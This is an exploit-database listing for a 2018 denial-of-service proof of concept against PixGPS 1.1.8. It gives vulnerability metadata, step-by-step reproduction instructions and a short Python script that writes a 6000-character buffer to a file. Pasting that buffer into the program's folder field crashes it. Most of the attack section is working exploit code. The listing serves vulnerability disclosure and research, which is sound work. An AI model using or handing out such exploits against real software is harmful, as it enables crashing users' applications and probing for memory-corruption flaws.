header-logo
Suggest Exploit
vendor:
PixGPS
by:
Gionathan "John" Reale
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: PixGPS
Affected Version From: 1.1.2008
Affected Version To: 1.1.2008
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 32-bit
2018

PixGPS 1.1.8 – Denial of Service (PoC)

The exploit creates a file with a large payload and when the contents of the file are pasted into a specific field in the PixGPS program, it causes a crash.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: PixGPS 1.1.8 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-10
# Software Link: http://www.br-software.com/pixgps11_setup.exe
# Tested Version: 1.1.8
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt". Copy the content from "exploit.txt".
# Now start the program. 
# Now when you are inside of the program paste the contents of "exploit.txt" into the field:"Folder with picture files"
# Click the "..." button and you will see a crash!  

#!/usr/bin/python
   
buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"